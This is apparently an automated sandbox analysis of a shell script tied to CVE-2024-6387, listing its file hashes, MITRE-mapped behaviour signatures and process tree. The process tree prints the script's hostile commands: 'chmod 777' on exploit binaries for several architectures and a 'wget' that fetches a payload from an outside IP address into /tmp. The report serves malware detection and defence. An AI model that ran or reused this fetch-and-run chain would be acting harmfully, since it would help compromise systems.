Analysis

  • max time kernel
    132s
  • max time network
    167s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240729-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240729-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    23-11-2024 18:22

General

  • Target

    cve_2024_6387/execute_and_cleanup.sh

  • Size

    926B

  • MD5

    1f452448cea986aedc88ba50d48691f7

  • SHA1

    98cee6d3b4a210be77fa4a458b06b805fa781bd7

  • SHA256

    67564d4a3ad079b6ec430193d5a60ce67df4d13409387fd074fd10d921fda20e

  • SHA512

    e11bb1ee0a50674550e3710c0e9670d2fe15b53f450bbc54d5dcc511999114f5e21aa0ee396c6b2e9e85fd2afe9078ca16b128e563f2b8acb9167d693e63183a

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Reads runtime system information 1 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/cve_2024_6387/execute_and_cleanup.sh
    /tmp/cve_2024_6387/execute_and_cleanup.sh
    1⤵
      PID:706
      • /bin/mkdir
        mkdir -p /tmp/downloads
        2⤵
        • Reads runtime system information
        PID:710
      • /bin/chmod
        chmod 777 386 aarch64 amd64 arm5 arm6 arm7 c.txt 验证利用脚本.txt execute_and_cleanup.sh exploit exploit.py ip.txt mips mips64 mips64el mipsel
        2⤵
        • File and Directory Permissions Modification
        PID:715
      • /usr/bin/wget
        wget http://108.174.58.28/386 -O /tmp/downloads/386
        2⤵
        • Writes file to tmp directory
        PID:718

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads